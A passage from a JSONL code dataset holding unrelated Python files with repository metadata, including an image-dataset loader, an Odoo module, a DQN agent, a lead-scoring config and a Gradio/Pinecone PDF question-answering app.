------------------------------------------------------------------------\n # -- Dataset Interface: clean_up()\n # ------------------------------------------------------------------------\n\n def clean_up(self):\n if path.isdir(self.home()):\n shutil.rmtree(self.home())\n\n # ------------------------------------------------------------------------\n # -- Standard Tasks\n # ------------------------------------------------------------------------\n\n def raw_classification_task(self, split=None):\n \"\"\"Return image_paths, labels\"\"\"\n if split:\n inds = self.splits[split]\n else:\n inds = xrange(len(self.meta))\n image_paths = [self.meta[ind]['filename'] for ind in inds]\n names = [self.meta[ind]['name'] for ind in inds]\n labels = np.searchsorted(self.names, names)\n return image_paths, labels\n\n def img_classification_task(self, dtype='uint8', split=None):\n img_paths, labels = self.raw_classification_task(split=split)\n imgs = larray.lmap(ImgLoader(ndim=3, dtype=dtype, mode='RGB'),\n img_paths)\n return imgs, labels\n\n\nclass Caltech101(BaseCaltech):\n URL = ('http://www.vision.caltech.edu/Image_Datasets/'\n 'Caltech101/101_ObjectCategories.tar.gz')\n SHA1 = 'b8ca4fe15bcd0921dfda882bd6052807e63b4c96'\n SUBDIR = '101_ObjectCategories'\n\n\nclass Caltech256(BaseCaltech):\n URL = ('http://www.vision.caltech.edu/Image_Datasets/'\n 'Caltech256/256_ObjectCategories.tar')\n SHA1 = '2195e9a478cf78bd23a1fe51f4dabe1c33744a1c'\n SUBDIR = '256_ObjectCategories'\n","repo_name":"jaberg/skdata","sub_path":"skdata/caltech.py","file_name":"caltech.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","stars":475,"dataset":"github-code","pt":"57"} +{"seq_id":"25250654819","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nfrom num2words import num2words\n\n\nclass AccountInvoice(models.Model):\n _inherit = \"account.invoice\"\n _description = \"Invoice\"\n\n @api.multi\n def amount_to_word(self, amount):\n return num2words(amount, lang='en').title()\n\n\nclass AccountBankStatement(models.Model):\n _inherit = \"account.bank.statement\"\n\n referenceRecive = fields.Char(string='R Reference', states={'open': [('readonly', False)]}, copy=False,\n readonly=True,\n help=\"Used to hold the reference of the external mean that created this statement (name of imported file, reference of online synchronization...)\")\n \nclass AccountInvoiceLine(models.Model):\n _inherit = 'account.invoice.line'\n\n imw_qty = fields.Float(string='Quantity')\n imw_measurement = fields.Float(string='Measurement',default=1)\n category_id = fields.Many2one('product.category', 'category')\n otherUnitMeasure = fields.Many2one('uom.uom', 'Other Unit of Measure')\n\n# Adding Reference 2 field in Model account.move as an optional field dtd:2019-06-26\nclass JournalEntriesRef2(models.Model):\n _inherit='account.move'\n\n imw_ref2=fields.Char('Reference2')\n\n\n @api.multi\n @api.onchange('imw_qty', 'imw_measurement')\n def _ChangeQty(self):\n if float(self.imw_measurement) == 0:\n self.imw_measurement = 1\n\n self.quantity = float(self.imw_qty) * float(self.imw_measurement)\n\n\n\n\n\n\n @api.multi\n @api.onchange('product_id')\n def _onchangeProductId(self):\n self.otherUnitMeasure = self.product_id.otherUnitMeasure\n\n if float(self.imw_qty) == 0:\n self.imw_qty = 1\n\n if float(self.imw_measurement) == 0:\n self.imw_measurement = 1\n # self.product_uom_qty = float(self.imw_qty) * float(self.imw_measurement)\n imwQty = float(self.imw_qty) if float(self.imw_qty) > 0 else 1\n self.imw_measurement = float(self.quantity) / imwQty\n\n\n","repo_name":"International-Marine-Works/IMW","sub_path":"imw__customization/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7293750754","text":"def create_matrix():\n rows, columns = [int(x) for x in input().split()]\n demo_matrix = []\n for row in range(rows):\n elements = [x for x in input().split()]\n demo_matrix.append(elements)\n return demo_matrix, columns\n\n\ndef search_equal_cells(copy_matrix, column_len):\n count = 0\n for i_row in range(len(copy_matrix) - 1):\n for i_column in range(column_len - 1):\n if copy_matrix[i_row][i_column] == copy_matrix[i_row][i_column + 1] == copy_matrix[i_row + 1][i_column] == \\\n copy_matrix[i_row + 1][i_column + 1]:\n count += 1\n return count\n\n\nmatrix, column_size = create_matrix()\nsearch_2x2 = search_equal_cells(matrix, column_size)\nprint(search_2x2)\n","repo_name":"alexanderivanov2/Softuni-Software-Engineering","sub_path":"Python Advanced/3. Multidimensional Lists/2x2_squares_in_matrix.py","file_name":"2x2_squares_in_matrix.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"5696816170","text":"from nextcord.ext import commands\n\nclass Info(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n\n @commands.command()\n @commands.cooldown(1, 5, commands.BucketType.member) # Cooldown\n async def ping(self, ctx):\n await ctx.reply('Pong !')\n\n\ndef setup(bot):\n bot.add_cog(Info(bot))","repo_name":"ZI1E/Nextcord-Template","sub_path":"cogs/Info.py","file_name":"Info.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"70675942898","text":"import random\nfrom collections import namedtuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.models as models\nimport copy\n\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n \"\"\"Saves a transition.\"\"\"\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass DeepQNetwork(nn.Module):\n def __init__(self, n_past_action_to_remember=10):\n super(DeepQNetwork, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(4096 + 9 * n_past_action_to_remember, 1024),\n nn.ReLU(),\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Linear(1024, 9)\n )\n\n def forward(self, x):\n return self.model(x)\n\n\nclass Agent:\n def __init__(self, env,\n target_update=10,\n discout_rate=0.99,\n eps_start=0.9,\n eps_end=0.05,\n eps_decay=5,\n batch_size=64,\n memory_size=1000,\n n_past_action_to_remember=10,\n device=None,\n save_path=\"\"):\n self.target_update = target_update\n self.discount_rate = discout_rate\n self.n_action = env.action_space.n\n self.batch_size = batch_size\n self.n_past_action_to_remember = n_past_action_to_remember\n\n self.eps_start = eps_start\n self.eps_end = eps_end\n self.eps_decay = eps_decay\n\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") if device == None else device\n self.pretrained_cnn = self.get_pretrained_cnn()\n\n self.memory_size = memory_size\n self.policy_q_net = DeepQNetwork(n_past_action_to_remember).to(self.device)\n self.target_q_net = DeepQNetwork(n_past_action_to_remember).to(self.device)\n self.target_q_net.load_state_dict(self.policy_q_net.state_dict())\n self.target_q_net.eval()\n\n self.optimizer = optim.Adam(self.policy_q_net.parameters())\n self.memory = ReplayMemory(memory_size)\n\n self.timestep_until_last_trigger_treshold = 40\n\n self.optimization_steps_since_last_update = 0\n self.current_epoch = 0\n self.t = 0\n self.history = self.clear_history()\n self.save_path = save_path\n print(\"Agent initialization done\")\n\n # def save_model(self, path):\n # torch.save(self.policy_q_net.state_dict(), os.path.join(path, 'best_policy_q_net.pt'))\n #\n # def load_model(self, path):\n # self.policy_q_net.load_state_dict(torch.load(path, map_location=self.device))\n # self.target_q_net.load_state_dict(torch.load(path, map_location=self.device))\n\n def get_pretrained_cnn(self):\n pretrained_cnn = models.vgg16(pretrained=True)\n pretrained_cnn.classifier = nn.Sequential(*list(pretrained_cnn.classifier.children())[:-5])\n for param in pretrained_cnn.parameters():\n param.requires_grad = False\n return pretrained_cnn.to(self.device)\n\n def get_greedy_action(self, state):\n return self.policy_q_net(state).max(1)[1].view(1, 1)\n\n def get_epsilon_for_epsilon_greedy_policy(self, t):\n linear_decay = self.eps_start - (self.eps_start - self.eps_end) / self.eps_decay * t\n return max(linear_decay, self.eps_end)\n\n def get_action(self, state, env):\n threshold = self.get_epsilon_for_epsilon_greedy_policy(t=self.current_epoch)\n\n if random.random() > threshold:\n with torch.no_grad():\n return self.get_greedy_action(state)\n else:\n # positive_rewards=[]\n positive_rewards = env.positive_reward_actions()\n # print(\"positive_rewards\", positive_rewards)\n if len(positive_rewards) != 0:\n action = random.choice(positive_rewards)\n else:\n action = random.randrange(self.n_action)\n return torch.tensor([[action]], device=self.device, dtype=torch.long)\n\n def optimize_model(self):\n\n if len(self.memory) < self.batch_size:\n return\n # print(\"OPTIMIZING MODEL\")\n if self.optimization_steps_since_last_update == self.target_update:\n self.optimization_steps_since_last_update = 0\n self.target_q_net.load_state_dict(self.policy_q_net.state_dict())\n self.optimization_steps_since_last_update += 1\n\n # batch of transistions to transitions of batch\n transitions = self.memory.sample(self.batch_size)\n batch = Transition(*zip(*transitions))\n state_batch = torch.cat(batch.state)\n action_batch = torch.cat(batch.action)\n reward_batch = torch.cat(batch.reward)\n\n # Mask of non-final states\n non_final_mask = torch.tensor(tuple(map(lambda s: s is not None, batch.next_state)), device=self.device,\n dtype=torch.uint8)\n non_final_next_states = torch.cat([s for s in batch.next_state if s is not None])\n\n # Q(s_t, a)\n state_action_values = self.policy_q_net(state_batch).gather(1, action_batch)\n\n # V(s_{t+1}) by older q_net\n next_state_values = torch.zeros(self.batch_size, device=self.device)\n next_state_values[non_final_mask] = self.target_q_net(non_final_next_states).max(1)[0].detach()\n\n # E[Q(s_t, a)]\n expected_state_action_values = (next_state_values * self.discount_rate) + reward_batch\n\n # Loss\n loss = F.mse_loss(state_action_values, expected_state_action_values.unsqueeze(1))\n # loss = F.smooth_l1_loss(state_action_values, expected_state_action_values.unsqueeze(1))\n\n # optimization\n self.optimizer.zero_grad()\n loss.backward()\n # for param in self.policy_q_net.parameters():\n # param.grad.data.clamp_(-1,1)\n self.optimizer.step()\n\n def get_state_from_observation(self, obs):\n index, img, bb = obs\n obs_for_cnn = torch.from_numpy(img).permute(2, 0, 1).unsqueeze(0).float().to(self.device) / 255\n features = self.pretrained_cnn(obs_for_cnn)\n return torch.cat((features, self.history.unsqueeze(0)), 1)\n\n def update_history(self, action):\n self.history[self.n_action:] = self.history[:- self.n_action]\n self.history[:self.n_action] = torch.zeros(self.n_action)\n self.history[action] = torch.tensor([1], device=self.device)\n\n def clear_history(self):\n return torch.zeros(self.n_action * self.n_past_action_to_remember, device=self.device)\n\n def train_episode(self, env):\n rewards = []\n self.history = self.clear_history()\n observation = env.reset()\n state = self.get_state_from_observation(observation)\n past_state = state\n done = False\n while not done:\n action = self.get_action(state, env)\n self.update_history(action)\n observation, reward, done, info = env.step(action)\n reward = torch.tensor([reward], device=self.device)\n state = self.get_state_from_observation(observation)\n self.memory.push(past_state, action, state, reward)\n past_state = state\n\n self.optimize_model()\n rewards.append(reward)\n return torch.cat(rewards)\n\n def test_episode(self, env, rand=True):\n timestep_until_last_trigger = 0\n self.history = self.clear_history()\n observation = env.reset(rand)\n state = self.get_state_from_observation(observation)\n done = False\n\n image = copy.deepcopy(env.image)\n bounding_boxes_labels = copy.deepcopy(env.bounding_boxes)\n bounding_boxes_region_proposal = [observation[2]]\n trigger_indexes = []\n\n t = 1\n while not done:\n action = self.get_greedy_action(state)\n self.update_history(action)\n observation, reward, done, info = env.step(action, train = False)\n state = self.get_state_from_observation(observation)\n\n bounding_boxes_region_proposal.append(observation[2])\n\n if action == env.action_space.n - 1:\n trigger_indexes.append(t)\n\n if action <= env.action_space.n - 1:\n timestep_until_last_trigger += 1\n\n if timestep_until_last_trigger == self.timestep_until_last_trigger_treshold:\n obs = env.restart()\n state = self.get_state_from_observation(obs)\n timestep_until_last_trigger = 0\n t += 1\n\n return image, bounding_boxes_labels, bounding_boxes_region_proposal, trigger_indexes\n\n def show_episode(self, env, image_class_index = None):\n temp_image_class_index = env.image_class_index\n if image_class_index != None:\n env.image_class_index = image_class_index\n rand = True if image_class_index == None else False\n\n done = False\n self.history = self.clear_history()\n observation = env.reset(rand)\n state = self.get_state_from_observation(observation)\n\n imgs, actions, rewards, ious = [observation[1]], [-1], [0], [env.past_iou]\n t=0\n\n while not done:\n action = self.get_greedy_action(state)\n self.update_history(action)\n observation, reward, done, info = env.step(action, train = True)\n state = self.get_state_from_observation(observation)\n\n\n imgs.append(observation[1])\n actions.append(action.item())\n rewards.append(reward)\n ious.append(env.past_iou)\n t+=1\n if image_class_index != None:\n env.image_class_index = temp_image_class_index\n return imgs, actions, rewards, ious, t\n\n\n","repo_name":"jgsimard/COMP767","sub_path":"project/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":10193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9188312374","text":"#!/usr/bin/env python\n\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\neigenvec = np.genfromtxt(\"plink.eigenvec\", dtype = None, encoding = None, names = [\"family_id\", \"sample_id\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"])\n\nfig, ax = plt.subplots()\n\n\nax.scatter(eigenvec[\"1\"], eigenvec[\"2\"])\nax.set_xlabel(\"PC1\")\nax.set_ylabel(\"PC2\")\n# ax.legend()\nax.title.set_text('PCA analysis')\nplt.savefig(\"PC1vs2.png\")\nplt.show()","repo_name":"dlgosk95/qbb2022-answers","sub_path":"week4-homework/gwas_data/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30038101690","text":"import os\nNAME_FILE = 'data.csv'\nFULL_PATH_DATA = os.path.os.getcwd() \n\nREPO_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../'))\nDATA_DIR = os.path.join(REPO_DIR, 'data')\nFILE_DATA = os.path.join(DATA_DIR, NAME_FILE)\n\nOUTPUTS_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../output'))\nOUTPUTS_MODELS_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../models'))\n\nPERF_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../lead_scoring_marieme_alessio/domain/perf.txt'))\n\n\n_SAVED_FILENAME = '_processed_data.csv'\nJL = '.joblib'\n\nLOG_REG_SAVED_FILENAME = 'log_reg' + _SAVED_FILENAME\nLOG_REG_MODEL_FILE = 'log_reg' + JL\n\nKNN = 'knn'\nKNN_SAVED_FILENAME = KNN + _SAVED_FILENAME\nKNN_MODEL_FILE = KNN + JL\n\nRF = 'rf'\nRF_SAVED_FILENAME = RF + _SAVED_FILENAME\nRF_MODEL_FILE = RF + JL\n\nSVC = 'svc'\nSVC_SAVED_FILENAME = SVC + _SAVED_FILENAME\nSVC_MODEL_FILE = SVC + JL\n\nGB = 'gb'\nGB_SAVED_FILENAME = GB + _SAVED_FILENAME\nGB_MODEL_FILE = GB + JL\n\n\nINFO_LOG_FILE_NAME = 'lead_scoring_info_log.log'\nDATA_DIR = os.path.join(REPO_DIR, 'logs')\nFILE_LOG = os.path.join(DATA_DIR, INFO_LOG_FILE_NAME)\nLOGGING_FORMAT = '[%(asctime)s][%(levelname)s][%(module)s] - %(message)s'\nLOGGING_DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n#FORMAT = '%(asctime)-15s %(clientip)s %(user)-8s %(message)s'\n\n\n#new column names :\nID_CLIENT = 'ID_CLIENT'\nORIGINE_LEAD = 'ORIGINE_LEAD'\nSOURCE_LEAD = 'SOURCE_LEAD'\nNIVEAU_LEAD = 'NIVEAU_LEAD'\nQUALITE_LEAD = 'QUALITE_LEAD'\nCONTACT_PAR_MAIL = 'CONTACT_PAR_MAIL'\nCONTACT_PAR_TELEPHONE = 'CONTACT_PAR_TELEPHONE'\nSTATUT_ACTUEL = 'STATUT_ACTUEL'\nTARGET = 'TARGET'\nNB_VISITES = 'NB_VISITES'\nDUREE_SUR_SITEWEB = 'DUREE_SUR_SITEWEB'\nNB_PAGES_VUES_PAR_VISITE = 'NB_PAGES_VUES_PAR_VISITE'\nDERNIERE_ACTIVITE = 'DERNIERE_ACTIVITE'\nDERNIERE_ACTIVITE_NOTABLE = 'DERNIERE_ACTIVITE_NOTABLE'\nPAYS = 'PAYS'\nVILLE = 'VILLE'\nSPECIALISATION = 'SPECIALISATION'\nTAGS = 'TAGS'\nINDEX_ACTIVITE = 'INDEX_ACTIVITE'\nINDEX_PROFIL = 'INDEX_PROFIL'\nSCORE_ACTIVITE = 'SCORE_ACTIVITE'\nSCORE_PROFIL = 'SCORE_PROFIL'\nANNONCE_VUE = 'ANNONCE_VUE'\nMAGAZINE = 'MAGAZINE'\nARTICLE_JOURNAL = 'ARTICLE_JOURNAL'\nFORUM = 'FORUM'\nJOURNAUX = 'JOURNAUX'\nPUB_DIGITALE = 'PUB_DIGITALE'\nRECOMMANDATION = 'RECOMMANDATION'\nC_ENT_PARLER_NS = 'C_ENT_PARLER_NS'\nSOUH_TU_REC_INFOS = 'SOUH_TU_REC_INFOS'\nSOUH_REC_MAJ_PROG = 'SOUH_REC_MAJ_PROG'\nSOUH_REC_MAJ_MP = 'SOUH_REC_MAJ_MP'\nSOUH_PAYER_CHEQUE = 'SOUH_PAYER_CHEQUE'\nSOUH_REC_COPIE_LB = 'SOUH_REC_COPIE_LB'\n\nPRED_COL_NAME = 'PREDICTION'\nPRED_PROBA_COL_NAME = 'PREDICTED_PROBABILITY'\n \n\nNEW_COL_NAMES = [\n ID_CLIENT,\n ORIGINE_LEAD,\n SOURCE_LEAD,\n NIVEAU_LEAD,\n QUALITE_LEAD,\n CONTACT_PAR_MAIL,\n CONTACT_PAR_TELEPHONE,\n STATUT_ACTUEL,\n TARGET,\n NB_VISITES,\n DUREE_SUR_SITEWEB,\n NB_PAGES_VUES_PAR_VISITE,\n DERNIERE_ACTIVITE,\n DERNIERE_ACTIVITE_NOTABLE,\n PAYS,\n VILLE,\n SPECIALISATION,\n TAGS,\n INDEX_ACTIVITE,\n INDEX_PROFIL,\n SCORE_ACTIVITE,\n SCORE_PROFIL,\n ANNONCE_VUE,\n MAGAZINE,\n ARTICLE_JOURNAL,\n FORUM,\n JOURNAUX,\n PUB_DIGITALE,\n RECOMMANDATION,\n C_ENT_PARLER_NS,\n SOUH_TU_REC_INFOS,\n SOUH_REC_MAJ_PROG,\n SOUH_REC_MAJ_MP,\n SOUH_PAYER_CHEQUE,\n SOUH_REC_COPIE_LB\n]\n\nCOL_NAME_TRAIN = ['ID_CLIENT', 'ORIGINE_LEAD', 'SOURCE_LEAD', 'NIVEAU_LEAD',\n 'QUALITE_LEAD', 'CONTACT_PAR_MAIL', 'CONTACT_PAR_TELEPHONE',\n 'STATUT_ACTUEL', 'CONVERTI', 'NB_VISITES', 'DUREE_SUR_SITEWEB',\n 'NB_PAGES_VUES_PAR_VISITE', 'DERNIERE_ACTIVITE',\n 'DERNIERE_ACTIVITE_NOTABLE', 'PAYS', 'VILLE', 'SPECIALISATION', 'TAGS',\n 'INDEX_ACTIVITE', 'INDEX_PROFIL', 'SCORE_ACTIVITE', 'SCORE_PROFIL',\n 'ANNONCE_VUE', 'MAGAZINE', 'ARTICLE_JOURNAL', 'FORUM', 'JOURNAUX',\n 'PUB_DIGITALE', 'RECOMMANDATION',\n 'Comment avez-vous entendu parler de nous ?',\n 'Souhaites-tu recevoir plus d\\'infos sur notre cours ?',\n 'Souhaites-tu recevoir des mises à jour sur nos programmes ?',\n 'Souhaites-tu recevoir des mises à jour par message privé ?',\n 'Souhaites-tu payer par chèque ?',\n 'Souhaites-tu recevoir une copie de notre livre blanc ?']\n\nimport re\n\ndef clean_line(line) :\n e = re.compile('[éèê]')\n a = re.compile('[àâ]')\n u = re.compile('[û]')\n o = re.compile('[ô]')\n\n line = e.sub('e', line)\n line = a.sub('a', line)\n line = u.sub('u', line)\n line = o.sub('o', line)\n return line.lower().rstrip().lstrip()\n\n\n\n#############################\n\n\nuse_qualite_lead = []\npath =os.path.abspath(os.path.join(os.path.dirname(__file__), 'use_qualite_lead.txt'))\nf = open(path, 'r') \nlines = f.readlines()\nfor line in lines: \n line = clean_line(line)\n use_qualite_lead.append(line)\n\nuse_tags = []\npath =os.path.abspath(os.path.join(os.path.dirname(__file__), 'use_tags.txt'))\nf = open(path, 'r') \nlines = f.readlines()\nfor line in lines: \n line = clean_line(line)\n use_tags.append(line)\n\nuse_der_act = []\npath =os.path.abspath(os.path.join(os.path.dirname(__file__), 'use_der_act.txt'))\nf = open(path, 'r') \nlines = f.readlines()\nfor line in lines: \n line = clean_line(line)\n use_der_act.append(line)\n\n\n\nCAT_FEAT = [QUALITE_LEAD, TAGS, DERNIERE_ACTIVITE]\n\nuse_lists = [\n use_qualite_lead,\n use_tags,\n use_der_act,\n]\n\nNUM_FEAT =[DUREE_SUR_SITEWEB, NB_VISITES]\n\nFEATURES = CAT_FEAT + NUM_FEAT\nCOLS_TO_KEEP = FEATURES + [TARGET]","repo_name":"alex-toy/lead_scoring","sub_path":"lead_scoring_marieme_alessio/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"73550215219","text":"import gradio as gr\n#from langchain.document_loaders import UnstructuredPDFLoader\nfrom langchain.document_loaders import PyPDFLoader\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\n#from langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Pinecone\nimport pinecone\nimport requests\nimport sys\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain import PromptTemplate\nfrom langchain import HuggingFaceHub\nfrom PyPDF2 import PdfReader\n#from langchain.document_loaders import TextLoader\nfrom pathlib import Path\nfrom time import sleep\nimport os\nimport random\nimport string\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef generate_random_string(length):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length)) \nrandom_string = generate_random_string(8)\n\nfile_path = os.path.join(os.getcwd(), \"valuation.pdf\")\n#loader = PyPDFLoader(file_path)/ PyPDFLoader(\"60LEADERSONAI.pdf\")\n#data = loader.load()\n#db_texts = text_splitter.split_documents(data)\n\ndata = PdfReader(file_path)\nraw_text = ''\ndb_texts=''\nfor i, page in enumerate(data.pages):\n text = page.extract_text()\n if text:\n raw_text += text\n text_splitter = RecursiveCharacterTextSplitter( \n# separator = \"\\n\",\n chunk_size = 1000,\n chunk_overlap = 100,\n length_function = len,\n )\n db_texts = text_splitter.split_text(raw_text)\n\nclass HFEmbeddings:\n def __init__(self, api_url, headers):\n self.api_url = api_url\n self.headers = headers\n def get_embeddings(self, texts):\n response = requests.post(self.api_url, headers=self.headers, json={\"inputs\": texts, \"options\": {\"wait_for_model\": True}})\n embeddings = response.json()\n return embeddings\n def embed_documents(self, texts):\n embeddings = self.get_embeddings(texts)\n return embeddings\n def __call__(self, texts):\n return self.embed_documents(texts)\n\nHUGGINGFACEHUB_API_TOKEN = os.getenv('HUGGINGFACEHUB_API_TOKEN')\nmodel_id = os.getenv('model_id')\nhf_token = os.getenv('hf_token')\nrepo_id = os.getenv('repo_id')\n\napi_url = f\"https://api-inference.huggingface.co/pipeline/feature-extraction/{model_id}\"\nheaders = {\"Authorization\": f\"Bearer {hf_token}\"}\n\nhf_embeddings = HFEmbeddings(api_url, headers)\n\nPINECONE_API_KEY = os.getenv('PINECONE_API_KEY')\nPINECONE_ENVIRONMENT = os.getenv('PINECONE_ENVIRONMENT')\nPINECONE_INDEX_NAME = os.getenv('PINECONE_INDEX_NAME')\n\npinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_ENVIRONMENT)\nindex_name = PINECONE_INDEX_NAME\nnamespace = random_string\n\nvector_db = Pinecone.from_texts(db_texts, hf_embeddings, index_name=index_name, namespace=namespace)\nprint(\"Pinecone Vector/Embedding DB Ready.\")\n\nindex_name_extracted=pinecone.list_indexes()\nindex_current = pinecone.Index(index_name=index_name)\nindex_status=index_current.describe_index_stats() \n\nllm = HuggingFaceHub(repo_id=repo_id,\n model_kwargs={\"min_length\":100,\n \"max_new_tokens\":1024, \"do_sample\":True,\n \"temperature\":0.1,\n \"top_k\":50,\n \"top_p\":0.95, \"eos_token_id\":49155})\nprompt_template = \"\"\"You are a very helpful AI assistant. Please ONLY use the given context to answer the user's input question. If you don't know the answer, just say that you don't know.\nContext: {context}\nQuestion: {question}\nHelpful AI Repsonse:\n\"\"\"\nPROMPT = PromptTemplate(template=prompt_template, input_variables=[\"context\", \"question\"])\nchain = load_qa_chain(llm=llm, chain_type=\"stuff\", prompt=PROMPT)\n\ndef run_chain(user_query):\n pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_ENVIRONMENT)\n index_name_extracted=pinecone.list_indexes()\n index_current = pinecone.Index(index_name=index_name)\n index_status=index_current.describe_index_stats()\n if user_query !=\"\" and not user_query.strip().isspace() and not user_query.isspace():\n print(\"Your query:\\n\"+user_query)\n vector_db_from_index = Pinecone.from_existing_index(index_name, hf_embeddings, namespace=namespace)\n ss_results = vector_db_from_index.similarity_search(query=user_query, namespace=namespace, k=5)\n initial_ai_response = chain.run(input_documents=ss_results, question=user_query, return_only_outputs=True) \n #initial_ai_response=chain({\"input_documents\": ss_results, \"question\": user_query}, return_only_outputs=True) \n temp_ai_response = initial_ai_response.partition('<|end|>')[0]\n final_ai_response = temp_ai_response.replace('\\n', '')\n print(\"final_ai_response:\"+final_ai_response)\n return final_ai_response\n else:\n print(\"Invalid inputs.\") \n\ndef delete_index_namespace(): \n pinecone.init(api_key=PINECONE_API_KEY, environment=PINECONE_ENVIRONMENT)\n index_name_extracted=pinecone.list_indexes()\n index_current = pinecone.Index(index_name=index_name)\n index_status=index_current.describe_index_stats() \n index_namespace_to_delete = pinecone.Index(index_name=index_name)\n index_namespace_to_delete.delete(delete_all=True, namespace=namespace)\n print(\"Pinecone Index Namespace: \"+namespace+\" has been deleted!\")\n \nwith gr.Blocks() as demo:\n gr.Markdown(\"Enter your question below & click Get AI Response. Remember to clear data before exiting program.\")\n with gr.Row():\n user_query = gr.Textbox(label=\"User query input box\", placeholder=\"Enter your query here.\")\n ai_response = gr.Textbox(label=\"AI Response display area\", placeholder=\"AI Response to be displayed here.\")\n query_btn = gr.Button(\"Get AI Response\")\n ai_res_btn = gr.Button(\"Clear Data & Exit\")\n query_btn.click(fn=run_chain, inputs=user_query, outputs=ai_response)\n ai_res_btn.click(fn=delete_index_namespace)\n\ndemo.launch()\n","repo_name":"BinqiangLiu/hf_gradio_pinecone","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"36539003105","text":"# 입력\nN = int(input())\n\n# 동적계획법\ndp = [ None ] * (N + 1)\nfor i in range(N + 1):\n\tif i <= 1:\n\t\tdp[i] = 1\n\telse:\n\t\tdp[i] = dp[i - 1] + dp[i - 2]\n\n# 답 출력\nprint(dp[N])\n","repo_name":"wikibook/algorithm-math","sub_path":"본문/python/Code_3_07_2.py","file_name":"Code_3_07_2.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"ko","doc_type":"code","stars":7,"dataset":"github-code","pt":"57"} +{"seq_id":"42666382014","text":"import paths\nfrom astropy import coordinates\nimport pylab as pl\nimport spectral_cube\nfrom spectral_cube import SpectralCube\nimport os\nfrom scipy import ndimage\nimport itertools\nfrom astropy.io import fits\nimport radio_beam\nimport numpy as np\nfrom astropy import units as u\nimport pyregion\nimport image_tools\nfrom astropy import wcs\n\nimport re\nimport glob\n\n\ndef extract_radial_spectrum(cube, coordinate, excludemask, radial_bins=[(0,1),(1,2)]):\n\n\n yy,xx = np.indices(cube.shape[1:])\n rr = ((yy-coordinate[1])**2 + (xx-coordinate[0])**2)**0.5\n\n spectra = {}\n for inner_bin_radius,outer_bin_radius in radial_bins:\n radial_mask = (rr > inner_bin_radius) & (rr < outer_bin_radius)\n radial_mask &= ~excludemask\n\n avspec = cube.with_mask(radial_mask).mean(axis=(1,2))\n\n spectra[(inner_bin_radius,outer_bin_radius)] = avspec\n\n return spectra\n\ndef spectra_from_cubefn(cubefn, reg, bins_arcsec, coordinate):\n cube = SpectralCube.read(cubefn)\n\n pixcoordinate = cube.wcs.celestial.wcs_world2pix(coordinate.ra.deg,\n coordinate.dec.deg,\n 0)\n\n pixscale = (cube.wcs.celestial.pixel_scale_matrix.diagonal()**2).sum()**0.5\n\n includemask = reg.get_mask(header=cube.wcs.celestial.to_header(),\n shape=cube.shape[1:])\n\n\n spectra = extract_radial_spectrum(cube, pixcoordinate, ~includemask,\n radial_bins=bins_arcsec/(pixscale*3600))\n\n return spectra\n\nif __name__ == \"__main__\":\n\n\n for sourcename,pfx,regfn in (('e2','e2e','e2_exclude_e2w.reg'),\n ('e8','e8','e8_core.reg'),\n ('north','north','north_core.reg')):\n\n #coordinate = coordinates.SkyCoord(\"19:23:43.961\",\n # \"+14:30:34.56\",\n # frame='fk5',\n # unit=(u.hour, u.deg))\n bins_ends_arcsec = np.linspace(0,2.25,7)\n bins_arcsec = np.array(list(zip(bins_ends_arcsec[:-1], bins_ends_arcsec[1:])))\n reg = pyregion.open(paths.rpath(regfn))\n coordinate = coordinates.SkyCoord(reg[0].coord_list[0],\n reg[0].coord_list[1],\n frame='fk5',\n unit=(u.deg, u.deg))\n\n\n for spw in (0,1,2,3):\n for suffix in 